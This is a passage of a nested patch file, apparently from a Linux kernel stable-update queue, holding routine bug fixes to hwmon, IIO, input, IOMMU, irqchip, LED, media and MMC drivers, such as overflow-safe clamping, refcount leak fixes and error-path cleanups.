++	val = DIV_ROUND_CLOSEST(clamp_val(val, 0, 255000), 1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->tcrit1[index] = val;
+@@ -391,7 +392,7 @@ static ssize_t tcrit1_hyst_store(struct device *dev,
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	val = DIV_ROUND_CLOSEST(val, 1000);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, -255000, 255000), 1000);
+ 	val = clamp_val((int)data->tcrit1[index] - val, 0, 31);
+ 
+ 	mutex_lock(&data->update_lock);
+@@ -431,7 +432,7 @@ static ssize_t offset_store(struct device *dev, struct device_attribute *attr,
+ 		return ret;
+ 
+ 	/* Accuracy is 1/2 degrees C */
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 500), -128, 127);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, -64000, 63500), 500);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->toffset[index] = val;
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index 9720ad214c20b..83e424945b598 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -2171,7 +2171,7 @@ store_temp_offset(struct device *dev, struct device_attribute *attr,
+ 	if (err < 0)
+ 		return err;
+ 
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), -128, 127);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, -128000, 127000), 1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->temp_offset[nr] = val;
+diff --git a/drivers/hwmon/w83627ehf.c b/drivers/hwmon/w83627ehf.c
+index 939d4c35e713c..66d71aba41711 100644
+--- a/drivers/hwmon/w83627ehf.c
++++ b/drivers/hwmon/w83627ehf.c
+@@ -895,7 +895,7 @@ store_target_temp(struct device *dev, struct device_attribute *attr,
+ 	if (err < 0)
+ 		return err;
+ 
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 0, 127);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, 0, 127000), 1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->target_temp[nr] = val;
+@@ -920,7 +920,7 @@ store_tolerance(struct device *dev, struct device_attribute *attr,
+ 		return err;
+ 
+ 	/* Limit the temp to 0C - 15C */
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 0, 15);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, 0, 15000), 1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	reg = w83627ehf_read_value(data, W83627EHF_REG_TOLERANCE[nr]);
+diff --git a/drivers/i3c/master/mipi-i3c-hci/dma.c b/drivers/i3c/master/mipi-i3c-hci/dma.c
+index 337c95d43f3f6..edc3a69bfe31f 100644
+--- a/drivers/i3c/master/mipi-i3c-hci/dma.c
++++ b/drivers/i3c/master/mipi-i3c-hci/dma.c
+@@ -291,7 +291,10 @@ static int hci_dma_init(struct i3c_hci *hci)
+ 
+ 		rh->ibi_chunk_sz = dma_get_cache_alignment();
+ 		rh->ibi_chunk_sz *= IBI_CHUNK_CACHELINES;
+-		BUG_ON(rh->ibi_chunk_sz > 256);
++		if (rh->ibi_chunk_sz > 256) {
++			ret = -EINVAL;
++			goto err_out;
++		}
+ 
+ 		ibi_status_ring_sz = rh->ibi_status_sz * rh->ibi_status_entries;
+ 		ibi_data_ring_sz = rh->ibi_chunk_sz * rh->ibi_chunks_total;
+diff --git a/drivers/iio/adc/ad7124.c b/drivers/iio/adc/ad7124.c
+index 4088786e1026d..deaf600d96fba 100644
+--- a/drivers/iio/adc/ad7124.c
++++ b/drivers/iio/adc/ad7124.c
+@@ -146,15 +146,18 @@ struct ad7124_chip_info {
+ struct ad7124_channel_config {
+ 	bool live;
+ 	unsigned int cfg_slot;
+-	enum ad7124_ref_sel refsel;
+-	bool bipolar;
+-	bool buf_positive;
+-	bool buf_negative;
+-	unsigned int vref_mv;
+-	unsigned int pga_bits;
+-	unsigned int odr;
+-	unsigned int odr_sel_bits;
+-	unsigned int filter_type;
++	/* Following fields are used to compare equality. */
++	struct_group(config_props,
++		enum ad7124_ref_sel refsel;
++		bool bipolar;
++		bool buf_positive;
++		bool buf_negative;
++		unsigned int vref_mv;
++		unsigned int pga_bits;
++		unsigned int odr;
++		unsigned int odr_sel_bits;
++		unsigned int filter_type;
++	);
+ };
+ 
+ struct ad7124_channel {
+@@ -333,11 +336,12 @@ static struct ad7124_channel_config *ad7124_find_similar_live_cfg(struct ad7124_
+ 	ptrdiff_t cmp_size;
+ 	int i;
+ 
+-	cmp_size = (u8 *)&cfg->live - (u8 *)cfg;
++	cmp_size = sizeof_field(struct ad7124_channel_config, config_props);
+ 	for (i = 0; i < st->num_channels; i++) {
+ 		cfg_aux = &st->channels[i].cfg;
+ 
+-		if (cfg_aux->live && !memcmp(cfg, cfg_aux, cmp_size))
++		if (cfg_aux->live &&
++		    !memcmp(&cfg->config_props, &cfg_aux->config_props, cmp_size))
+ 			return cfg_aux;
+ 	}
+ 
+@@ -761,6 +765,7 @@ static int ad7124_soft_reset(struct ad7124_state *st)
+ 	if (ret < 0)
+ 		return ret;
+ 
++	fsleep(200);
+ 	timeout = 100;
+ 	do {
+ 		ret = ad_sd_read_reg(&st->sd, AD7124_STATUS, 1, &readval);
+diff --git a/drivers/iio/adc/ad7606.c b/drivers/iio/adc/ad7606.c
+index ba24f99523e01..00df4fc5a51f0 100644
+--- a/drivers/iio/adc/ad7606.c
++++ b/drivers/iio/adc/ad7606.c
+@@ -49,7 +49,7 @@ static const unsigned int ad7616_oversampling_avail[8] = {
+ 	1, 2, 4, 8, 16, 32, 64, 128,
+ };
+ 
+-static int ad7606_reset(struct ad7606_state *st)
++int ad7606_reset(struct ad7606_state *st)
+ {
+ 	if (st->gpio_reset) {
+ 		gpiod_set_value(st->gpio_reset, 1);
+@@ -60,6 +60,7 @@ static int ad7606_reset(struct ad7606_state *st)
+ 
+ 	return -ENODEV;
+ }
++EXPORT_SYMBOL_NS_GPL(ad7606_reset, IIO_AD7606);
+ 
+ static int ad7606_reg_access(struct iio_dev *indio_dev,
+ 			     unsigned int reg,
+@@ -88,31 +89,6 @@ static int ad7606_read_samples(struct ad7606_state *st)
+ {
+ 	unsigned int num = st->chip_info->num_channels - 1;
+ 	u16 *data = st->data;
+-	int ret;
+-
+-	/*
+-	 * The frstdata signal is set to high while and after reading the sample
+-	 * of the first channel and low for all other channels. This can be used
+-	 * to check that the incoming data is correctly aligned. During normal
+-	 * operation the data should never become unaligned, but some glitch or
+-	 * electrostatic discharge might cause an extra read or clock cycle.
+-	 * Monitoring the frstdata signal allows to recover from such failure
+-	 * situations.
+-	 */
+-
+-	if (st->gpio_frstdata) {
+-		ret = st->bops->read_block(st->dev, 1, data);
+-		if (ret)
+-			return ret;
+-
+-		if (!gpiod_get_value(st->gpio_frstdata)) {
+-			ad7606_reset(st);
+-			return -EIO;
+-		}
+-
+-		data++;
+-		num--;
+-	}
+ 
+ 	return st->bops->read_block(st->dev, num, data);
+ }
+diff --git a/drivers/iio/adc/ad7606.h b/drivers/iio/adc/ad7606.h
+index 2dc4f599f9df9..9d8520b8bada0 100644
+--- a/drivers/iio/adc/ad7606.h
++++ b/drivers/iio/adc/ad7606.h
+@@ -153,6 +153,8 @@ int ad7606_probe(struct device *dev, int irq, void __iomem *base_address,
+ 		 const char *name, unsigned int id,
+ 		 const struct ad7606_bus_ops *bops);
+ 
++int ad7606_reset(struct ad7606_state *st);
++
+ enum ad7606_supported_device_ids {
+ 	ID_AD7605_4,
+ 	ID_AD7606_8,
+diff --git a/drivers/iio/adc/ad7606_par.c b/drivers/iio/adc/ad7606_par.c
+index b912b4df9b563..0827d55355840 100644
+--- a/drivers/iio/adc/ad7606_par.c
++++ b/drivers/iio/adc/ad7606_par.c
+@@ -7,6 +7,7 @@
+ 
+ #include <linux/mod_devicetable.h>
+ #include <linux/module.h>
++#include <linux/gpio/consumer.h>
+ #include <linux/platform_device.h>
+ #include <linux/types.h>
+ #include <linux/err.h>
+@@ -21,8 +22,29 @@ static int ad7606_par16_read_block(struct device *dev,
+ 	struct iio_dev *indio_dev = dev_get_drvdata(dev);
+ 	struct ad7606_state *st = iio_priv(indio_dev);
+ 
+-	insw((unsigned long)st->base_address, buf, count);
+ 
++	/*
++	 * On the parallel interface, the frstdata signal is set to high while
++	 * and after reading the sample of the first channel and low for all
++	 * other channels.  This can be used to check that the incoming data is
++	 * correctly aligned.  During normal operation the data should never
++	 * become unaligned, but some glitch or electrostatic discharge might
++	 * cause an extra read or clock cycle.  Monitoring the frstdata signal
++	 * allows to recover from such failure situations.
++	 */
++	int num = count;
++	u16 *_buf = buf;
++
++	if (st->gpio_frstdata) {
++		insw((unsigned long)st->base_address, _buf, 1);
++		if (!gpiod_get_value(st->gpio_frstdata)) {
++			ad7606_reset(st);
++			return -EIO;
++		}
++		_buf++;
++		num--;
++	}
++	insw((unsigned long)st->base_address, _buf, num);
+ 	return 0;
+ }
+ 
+@@ -35,8 +57,28 @@ static int ad7606_par8_read_block(struct device *dev,
+ {
+ 	struct iio_dev *indio_dev = dev_get_drvdata(dev);
+ 	struct ad7606_state *st = iio_priv(indio_dev);
+-
+-	insb((unsigned long)st->base_address, buf, count * 2);
++	/*
++	 * On the parallel interface, the frstdata signal is set to high while
++	 * and after reading the sample of the first channel and low for all
++	 * other channels.  This can be used to check that the incoming data is
++	 * correctly aligned.  During normal operation the data should never
++	 * become unaligned, but some glitch or electrostatic discharge might
++	 * cause an extra read or clock cycle.  Monitoring the frstdata signal
++	 * allows to recover from such failure situations.
++	 */
++	int num = count;
++	u16 *_buf = buf;
++
++	if (st->gpio_frstdata) {
++		insb((unsigned long)st->base_address, _buf, 2);
++		if (!gpiod_get_value(st->gpio_frstdata)) {
++			ad7606_reset(st);
++			return -EIO;
++		}
++		_buf++;
++		num--;
++	}
++	insb((unsigned long)st->base_address, _buf, num * 2);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iio/buffer/industrialio-buffer-dmaengine.c b/drivers/iio/buffer/industrialio-buffer-dmaengine.c
+index f744b62a636ad..3d2ccae1e58dd 100644
+--- a/drivers/iio/buffer/industrialio-buffer-dmaengine.c
++++ b/drivers/iio/buffer/industrialio-buffer-dmaengine.c
+@@ -180,7 +180,7 @@ static struct iio_buffer *iio_dmaengine_buffer_alloc(struct device *dev,
+ 
+ 	ret = dma_get_slave_caps(chan, &caps);
+ 	if (ret < 0)
+-		goto err_free;
++		goto err_release;
+ 
+ 	/* Needs to be aligned to the maximum of the minimums */
+ 	if (caps.src_addr_widths)
+@@ -206,6 +206,8 @@ static struct iio_buffer *iio_dmaengine_buffer_alloc(struct device *dev,
+ 
+ 	return &dmaengine_buffer->queue.buffer;
+ 
++err_release:
++	dma_release_channel(chan);
+ err_free:
+ 	kfree(dmaengine_buffer);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/iio/inkern.c b/drivers/iio/inkern.c
+index bd854e92c6f8c..81344ceac951c 100644
+--- a/drivers/iio/inkern.c
++++ b/drivers/iio/inkern.c
+@@ -679,17 +679,17 @@ static int iio_convert_raw_to_processed_unlocked(struct iio_channel *chan,
+ 		break;
+ 	case IIO_VAL_INT_PLUS_MICRO:
+ 		if (scale_val2 < 0)
+-			*processed = -raw64 * scale_val;
++			*processed = -raw64 * scale_val * scale;
+ 		else
+-			*processed = raw64 * scale_val;
++			*processed = raw64 * scale_val * scale;
+ 		*processed += div_s64(raw64 * (s64)scale_val2 * scale,
+ 				      1000000LL);
+ 		break;
+ 	case IIO_VAL_INT_PLUS_NANO:
+ 		if (scale_val2 < 0)
+-			*processed = -raw64 * scale_val;
++			*processed = -raw64 * scale_val * scale;
+ 		else
+-			*processed = raw64 * scale_val;
++			*processed = raw64 * scale_val * scale;
+ 		*processed += div_s64(raw64 * (s64)scale_val2 * scale,
+ 				      1000000000LL);
+ 		break;
+diff --git a/drivers/input/misc/uinput.c b/drivers/input/misc/uinput.c
+index f2593133e5247..790db3ceb2083 100644
+--- a/drivers/input/misc/uinput.c
++++ b/drivers/input/misc/uinput.c
+@@ -416,6 +416,20 @@ static int uinput_validate_absinfo(struct input_dev *dev, unsigned int code,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * Limit number of contacts to a reasonable value (100). This
++	 * ensures that we need less than 2 pages for struct input_mt
++	 * (we are not using in-kernel slot assignment so not going to
++	 * allocate memory for the "red" table), and we should have no
++	 * trouble getting this much memory.
++	 */
++	if (code == ABS_MT_SLOT && max > 99) {
++		printk(KERN_DEBUG
++		       "%s: unreasonably large number of slots requested: %d\n",
++		       UINPUT_NAME, max);
++		return -EINVAL;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c
+index e3a36cd3656c0..8c8eea5173f7b 100644
+--- a/drivers/input/touchscreen/ili210x.c
++++ b/drivers/input/touchscreen/ili210x.c
+@@ -586,7 +586,7 @@ static int ili251x_firmware_to_buffer(const struct firmware *fw,
+ 	 * once, copy them all into this buffer at the right locations, and then
+ 	 * do all operations on this linear buffer.
+ 	 */
+-	fw_buf = kzalloc(SZ_64K, GFP_KERNEL);
++	fw_buf = kvmalloc(SZ_64K, GFP_KERNEL);
+ 	if (!fw_buf)
+ 		return -ENOMEM;
+ 
+@@ -616,7 +616,7 @@ static int ili251x_firmware_to_buffer(const struct firmware *fw,
+ 	return 0;
+ 
+ err_big:
+-	kfree(fw_buf);
++	kvfree(fw_buf);
+ 	return error;
+ }
+ 
+@@ -859,7 +859,7 @@ static ssize_t ili210x_firmware_update_store(struct device *dev,
+ 	ili210x_hardware_reset(priv->reset_gpio);
+ 	dev_dbg(dev, "Firmware update ended, error=%i\n", error);
+ 	enable_irq(client->irq);
+-	kfree(fwbuf);
++	kvfree(fwbuf);
+ 	return error;
+ }
+ 
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index 4759f79ad7b94..345c161ffb27a 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -1402,7 +1402,7 @@ int qi_submit_sync(struct intel_iommu *iommu, struct qi_desc *desc,
+ 	 */
+ 	writel(qi->free_head << shift, iommu->reg + DMAR_IQT_REG);
+ 
+-	while (qi->desc_status[wait_index] != QI_DONE) {
++	while (READ_ONCE(qi->desc_status[wait_index]) != QI_DONE) {
+ 		/*
+ 		 * We will leave the interrupts disabled, to prevent interrupt
+ 		 * context to queue another cmd while a cmd is already submitted
+diff --git a/drivers/iommu/sun50i-iommu.c b/drivers/iommu/sun50i-iommu.c
+index 5b585eace3d46..e8dc1a7d94911 100644
+--- a/drivers/iommu/sun50i-iommu.c
++++ b/drivers/iommu/sun50i-iommu.c
+@@ -449,6 +449,7 @@ static int sun50i_iommu_enable(struct sun50i_iommu *iommu)
+ 		    IOMMU_TLB_PREFETCH_MASTER_ENABLE(3) |
+ 		    IOMMU_TLB_PREFETCH_MASTER_ENABLE(4) |
+ 		    IOMMU_TLB_PREFETCH_MASTER_ENABLE(5));
++	iommu_write(iommu, IOMMU_BYPASS_REG, 0);
+ 	iommu_write(iommu, IOMMU_INT_ENABLE_REG, IOMMU_INT_MASK);
+ 	iommu_write(iommu, IOMMU_DM_AUT_CTRL_REG(SUN50I_IOMMU_ACI_NONE),
+ 		    IOMMU_DM_AUT_CTRL_RD_UNAVAIL(SUN50I_IOMMU_ACI_NONE, 0) |
+diff --git a/drivers/irqchip/irq-armada-370-xp.c b/drivers/irqchip/irq-armada-370-xp.c
+index ee18eb3e72b72..ab02b44a3b4ec 100644
+--- a/drivers/irqchip/irq-armada-370-xp.c
++++ b/drivers/irqchip/irq-armada-370-xp.c
+@@ -567,6 +567,10 @@ static struct irq_chip armada_370_xp_irq_chip = {
+ static int armada_370_xp_mpic_irq_map(struct irq_domain *h,
+ 				      unsigned int virq, irq_hw_number_t hw)
+ {
++	/* IRQs 0 and 1 cannot be mapped, they are handled internally */
++	if (hw <= 1)
++		return -EINVAL;
++
+ 	armada_370_xp_irq_mask(irq_get_irq_data(virq));
+ 	if (!is_percpu_irq(hw))
+ 		writel(hw, per_cpu_int_base +
+diff --git a/drivers/irqchip/irq-gic-v2m.c b/drivers/irqchip/irq-gic-v2m.c
+index 6e1ac330d7a60..414cd925064f4 100644
+--- a/drivers/irqchip/irq-gic-v2m.c
++++ b/drivers/irqchip/irq-gic-v2m.c
+@@ -438,12 +438,12 @@ static int __init gicv2m_of_init(struct fwnode_handle *parent_handle,
+ 
+ 		ret = gicv2m_init_one(&child->fwnode, spi_start, nr_spis,
+ 				      &res, 0);
+-		if (ret) {
+-			of_node_put(child);
++		if (ret)
+ 			break;
+-		}
+ 	}
+ 
++	if (ret && child)
++		of_node_put(child);
+ 	if (!ret)
+ 		ret = gicv2m_allocate_domains(parent);
+ 	if (ret)
+diff --git a/drivers/leds/leds-spi-byte.c b/drivers/leds/leds-spi-byte.c
+index 2bc5c99daf51a..6883d3ba382f9 100644
+--- a/drivers/leds/leds-spi-byte.c
++++ b/drivers/leds/leds-spi-byte.c
+@@ -91,7 +91,6 @@ static int spi_byte_probe(struct spi_device *spi)
+ 		dev_err(dev, "Device must have exactly one LED sub-node.");
+ 		return -EINVAL;
+ 	}
+-	child = of_get_next_available_child(dev_of_node(dev), NULL);
+ 
+ 	led = devm_kzalloc(dev, sizeof(*led), GFP_KERNEL);
+ 	if (!led)
+@@ -107,11 +106,13 @@ static int spi_byte_probe(struct spi_device *spi)
+ 	led->ldev.max_brightness = led->cdef->max_value - led->cdef->off_value;
+ 	led->ldev.brightness_set_blocking = spi_byte_brightness_set_blocking;
+ 
++	child = of_get_next_available_child(dev_of_node(dev), NULL);
+ 	state = of_get_property(child, "default-state", NULL);
+ 	if (state) {
+ 		if (!strcmp(state, "on")) {
+ 			led->ldev.brightness = led->ldev.max_brightness;
+ 		} else if (strcmp(state, "off")) {
++			of_node_put(child);
+ 			/* all other cases except "off" */
+ 			dev_err(dev, "default-state can only be 'on' or 'off'");
+ 			return -EINVAL;
+@@ -122,9 +123,12 @@ static int spi_byte_probe(struct spi_device *spi)
+ 
+ 	ret = devm_led_classdev_register(&spi->dev, &led->ldev);
+ 	if (ret) {
++		of_node_put(child);
+ 		mutex_destroy(&led->mutex);
+ 		return ret;
+ 	}
++
++	of_node_put(child);
+ 	spi_set_drvdata(spi, led);
+ 
+ 	return 0;
+diff --git a/drivers/md/dm-init.c b/drivers/md/dm-init.c
+index dc4381d683131..6e9e73a558740 100644
+--- a/drivers/md/dm-init.c
++++ b/drivers/md/dm-init.c
+@@ -213,8 +213,10 @@ static char __init *dm_parse_device_entry(struct dm_device *dev, char *str)
+ 	strscpy(dev->dmi.uuid, field[1], sizeof(dev->dmi.uuid));
+ 	/* minor */
+ 	if (strlen(field[2])) {
+-		if (kstrtoull(field[2], 0, &dev->dmi.dev))
++		if (kstrtoull(field[2], 0, &dev->dmi.dev) ||
++		    dev->dmi.dev >= (1 << MINORBITS))
+ 			return ERR_PTR(-EINVAL);
++		dev->dmi.dev = huge_encode_dev((dev_t)dev->dmi.dev);
+ 		dev->dmi.flags |= DM_PERSISTENT_DEV_FLAG;
+ 	}
+ 	/* flags */
+diff --git a/drivers/media/platform/qcom/camss/camss.c b/drivers/media/platform/qcom/camss/camss.c
+index a30461de3e844..d173ac80e01cf 100644
+--- a/drivers/media/platform/qcom/camss/camss.c
++++ b/drivers/media/platform/qcom/camss/camss.c
+@@ -1038,8 +1038,11 @@ static int camss_of_parse_endpoint_node(struct device *dev,
+ 	struct v4l2_mbus_config_mipi_csi2 *mipi_csi2;
+ 	struct v4l2_fwnode_endpoint vep = { { 0 } };
+ 	unsigned int i;
++	int ret;
+ 
+-	v4l2_fwnode_endpoint_parse(of_fwnode_handle(node), &vep);
++	ret = v4l2_fwnode_endpoint_parse(of_fwnode_handle(node), &vep);
++	if (ret)
++		return ret;
+ 
+ 	csd->interface.csiphy_id = vep.base.port;
+ 
+diff --git a/drivers/media/test-drivers/vivid/vivid-vid-cap.c b/drivers/media/test-drivers/vivid/vivid-vid-cap.c
+index c0999581c599b..3864df45077d0 100644
+--- a/drivers/media/test-drivers/vivid/vivid-vid-cap.c
++++ b/drivers/media/test-drivers/vivid/vivid-vid-cap.c
+@@ -113,8 +113,9 @@ static int vid_cap_queue_setup(struct vb2_queue *vq,
+ 		if (*nplanes != buffers)
+ 			return -EINVAL;
+ 		for (p = 0; p < buffers; p++) {
+-			if (sizes[p] < tpg_g_line_width(&dev->tpg, p) * h +
+-						dev->fmt_cap->data_offset[p])
++			if (sizes[p] < tpg_g_line_width(&dev->tpg, p) * h /
++					dev->fmt_cap->vdownsampling[p] +
++					dev->fmt_cap->data_offset[p])
+ 				return -EINVAL;
+ 		}
+ 	} else {
+@@ -1809,8 +1810,10 @@ int vidioc_s_edid(struct file *file, void *_fh,
+ 		return -EINVAL;
+ 	if (edid->blocks == 0) {
+ 		dev->edid_blocks = 0;
+-		v4l2_ctrl_s_ctrl(dev->ctrl_tx_edid_present, 0);
+-		v4l2_ctrl_s_ctrl(dev->ctrl_tx_hotplug, 0);
++		if (dev->num_outputs) {
++			v4l2_ctrl_s_ctrl(dev->ctrl_tx_edid_present, 0);
++			v4l2_ctrl_s_ctrl(dev->ctrl_tx_hotplug, 0);
++		}
+ 		phys_addr = CEC_PHYS_ADDR_INVALID;
+ 		goto set_phys_addr;
+ 	}
+@@ -1834,8 +1837,10 @@ int vidioc_s_edid(struct file *file, void *_fh,
+ 			display_present |=
+ 				dev->display_present[i] << j++;
+ 
+-	v4l2_ctrl_s_ctrl(dev->ctrl_tx_edid_present, display_present);
+-	v4l2_ctrl_s_ctrl(dev->ctrl_tx_hotplug, display_present);
++	if (dev->num_outputs) {
++		v4l2_ctrl_s_ctrl(dev->ctrl_tx_edid_present, display_present);
++		v4l2_ctrl_s_ctrl(dev->ctrl_tx_hotplug, display_present);
++	}
+ 
+ set_phys_addr:
+ 	/* TODO: a proper hotplug detect cycle should be emulated here */
+diff --git a/drivers/media/test-drivers/vivid/vivid-vid-out.c b/drivers/media/test-drivers/vivid/vivid-vid-out.c
+index 9f731f085179e..e96d3d014143f 100644
+--- a/drivers/media/test-drivers/vivid/vivid-vid-out.c
++++ b/drivers/media/test-drivers/vivid/vivid-vid-out.c
+@@ -63,14 +63,16 @@ static int vid_out_queue_setup(struct vb2_queue *vq,
+ 		if (sizes[0] < size)
+ 			return -EINVAL;
+ 		for (p = 1; p < planes; p++) {
+-			if (sizes[p] < dev->bytesperline_out[p] * h +
+-				       vfmt->data_offset[p])
++			if (sizes[p] < dev->bytesperline_out[p] * h /
++					vfmt->vdownsampling[p] +
++					vfmt->data_offset[p])
+ 				return -EINVAL;
+ 		}
+ 	} else {
+ 		for (p = 0; p < planes; p++)
+-			sizes[p] = p ? dev->bytesperline_out[p] * h +
+-				       vfmt->data_offset[p] : size;
++			sizes[p] = p ? dev->bytesperline_out[p] * h /
++					vfmt->vdownsampling[p] +
++					vfmt->data_offset[p] : size;
+ 	}
+ 
+ 	if (vq->num_buffers + *nbuffers < 2)
+@@ -127,7 +129,7 @@ static int vid_out_buf_prepare(struct vb2_buffer *vb)
+ 
+ 	for (p = 0; p < planes; p++) {
+ 		if (p)
+-			size = dev->bytesperline_out[p] * h;
++			size = dev->bytesperline_out[p] * h / vfmt->vdownsampling[p];
+ 		size += vb->planes[p].data_offset;
+ 
+ 		if (vb2_get_plane_payload(vb, p) < size) {
+@@ -334,8 +336,8 @@ int vivid_g_fmt_vid_out(struct file *file, void *priv,
+ 	for (p = 0; p < mp->num_planes; p++) {
+ 		mp->plane_fmt[p].bytesperline = dev->bytesperline_out[p];
+ 		mp->plane_fmt[p].sizeimage =
+-			mp->plane_fmt[p].bytesperline * mp->height +
+-			fmt->data_offset[p];
++			mp->plane_fmt[p].bytesperline * mp->height /
++			fmt->vdownsampling[p] + fmt->data_offset[p];
+ 	}
+ 	for (p = fmt->buffers; p < fmt->planes; p++) {
+ 		unsigned stride = dev->bytesperline_out[p];
+diff --git a/drivers/misc/vmw_vmci/vmci_resource.c b/drivers/misc/vmw_vmci/vmci_resource.c
+index 692daa9eff341..19c9d2cdd277b 100644
+--- a/drivers/misc/vmw_vmci/vmci_resource.c
++++ b/drivers/misc/vmw_vmci/vmci_resource.c
+@@ -144,7 +144,8 @@ void vmci_resource_remove(struct vmci_resource *resource)
+ 	spin_lock(&vmci_resource_table.lock);
+ 
+ 	hlist_for_each_entry(r, &vmci_resource_table.entries[idx], node) {
+-		if (vmci_handle_is_equal(r->handle, resource->handle)) {
++		if (vmci_handle_is_equal(r->handle, resource->handle) &&
++		    resource->type == r->type) {
+ 			hlist_del_init_rcu(&r->node);
+ 			break;
+ 		}
+diff --git a/drivers/mmc/core/quirks.h b/drivers/mmc/core/quirks.h
+index ec760ac0b3977..4b327b4815262 100644
+--- a/drivers/mmc/core/quirks.h
++++ b/drivers/mmc/core/quirks.h
+@@ -15,6 +15,19 @@
+ 
+ #include "card.h"
+ 
++static const struct mmc_fixup __maybe_unused mmc_sd_fixups[] = {
++	/*
++	 * Kingston Canvas Go! Plus microSD cards never finish SD cache flush.
++	 * This has so far only been observed on cards from 11/2019, while new
++	 * cards from 2023/05 do not exhibit this behavior.
++	 */
++	_FIXUP_EXT("SD64G", CID_MANFID_KINGSTON_SD, 0x5449, 2019, 11,
++		   0, -1ull, SDIO_ANY_ID, SDIO_ANY_ID, add_quirk_sd,
++		   MMC_QUIRK_BROKEN_SD_CACHE, EXT_CSD_REV_ANY),
++
++	END_FIXUP
++};
++
+ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ #define INAND_CMD38_ARG_EXT_CSD  113
+ #define INAND_CMD38_ARG_ERASE    0x00
+@@ -53,15 +66,6 @@ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ 	MMC_FIXUP("MMC32G", CID_MANFID_TOSHIBA, CID_OEMID_ANY, add_quirk_mmc,
+ 		  MMC_QUIRK_BLK_NO_CMD23),
+ 
+-	/*
+-	 * Kingston Canvas Go! Plus microSD cards never finish SD cache flush.
+-	 * This has so far only been observed on cards from 11/2019, while new
+-	 * cards from 2023/05 do not exhibit this behavior.
+-	 */
+-	_FIXUP_EXT("SD64G", CID_MANFID_KINGSTON_SD, 0x5449, 2019, 11,
+-		   0, -1ull, SDIO_ANY_ID, SDIO_ANY_ID, add_quirk_sd,
+-		   MMC_QUIRK_BROKEN_SD_CACHE, EXT_CSD_REV_ANY),
+-
+ 	/*
+ 	 * Some SD cards lockup while using CMD23 multiblock transfers.
+ 	 */
+diff --git a/drivers/mmc/core/sd.c b/drivers/mmc/core/sd.c
+index 246ce027ae0aa..30f6dbaa712ff 100644
+--- a/drivers/mmc/core/sd.c
++++ b/drivers/mmc/core/sd.c
+@@ -26,6 +26,7 @@
+ #include "host.h"
+ #include "bus.h"
+ #include "mmc_ops.h"
++#include "quirks.h"
+ #include "sd.h"
+ #include "sd_ops.h"
+ 
+@@ -1475,6 +1476,9 @@ static int mmc_sd_init_card(struct mmc_host *host, u32 ocr,
+ 			goto free_card;
+ 	}
+ 
++	/* Apply quirks prior to card setup */
++	mmc_fixup_device(card, mmc_sd_fixups);
++
+ 	err = mmc_sd_setup_card(host, card, oldcard != NULL);
+ 	if (err)
+ 		goto free_card;
+diff --git a/drivers/mmc/host/cqhci-core.c b/drivers/mmc/host/cqhci-core.c
+index 41e94cd141098..fe7a4eac9595c 100644
+--- a/drivers/mmc/host/cqhci-core.c
++++ b/drivers/mmc/host/cqhci-core.c
+@@ -612,7 +612,7 @@ static int cqhci_request(struct mmc_host *mmc, struct mmc_request *mrq)
+ 		cqhci_writel(cq_host, 0, CQHCI_CTL);
+ 		mmc->cqe_on = true;
+ 		pr_debug("%s: cqhci: CQE on\n", mmc_hostname(mmc));
+-		if (cqhci_readl(cq_host, CQHCI_CTL) && CQHCI_HALT) {
++		if (cqhci_readl(cq_host, CQHCI_CTL) & CQHCI_HALT) {
+ 			pr_err("%s: cqhci: CQE failed to exit halt state\n",
+ 			       mmc_hostname(mmc));
+ 		}
+diff --git a/drivers/mmc/host/dw_mmc.c b/drivers/mmc/host/dw_mmc.c
+index d0da4573b38cd..121e833efe289 100644
+--- a/drivers/mmc/host/dw_mmc.c
++++ b/drivers/mmc/host/dw_mmc.c
+@@ -2952,8 +2952,8 @@ static int dw_mci_init_slot(struct dw_mci *host)
+ 	if (host->use_dma == TRANS_MODE_IDMAC) {
+ 		mmc->max_segs = host->ring_size;
+ 		mmc->max_blk_size = 65535;
+-		mmc->max_seg_size = 0x1000;
+-		mmc->max_req_size = mmc->max_seg_size * host->ring_size;
++		mmc->max_req_size = DW_MCI_DESC_DATA_LENGTH * host->ring_size;
++		mmc->max_seg_size = mmc->max_req_size;
+ 		mmc->max_blk_count = mmc->max_req_size / 512;
+ 	} else if (host->use_dma == TRANS_MODE_EDMAC) {
+ 		mmc->max_segs = 64;
+diff --git a/drivers/mmc/host/sdhci-of-aspeed.c b/drivers/mmc/host/sdhci-of-aspeed.c
+index ba6677bf7372c..e60a2525e35b1 100644
+--- a/drivers/mmc/host/sdhci-of-aspeed.c
++++ b/drivers/mmc/host/sdhci-of-aspeed.c
+@@ -513,6 +513,7 @@ static const struct of_device_id aspeed_sdhci_of_match[] = {
+ 	{ .compatible = "aspeed,ast2600-sdhci", .data = &ast2600_sdhci_pdata, },
+ 	{ }
+ };
++MODULE_DEVICE_TABLE(of, aspeed_sdhci_of_match);
+ 
+ static struct platform_driver aspeed_sdhci_driver = {
+ 	.driver		= {
+diff --git a/drivers/net/bareudp.c b/drivers/net/bareudp.c
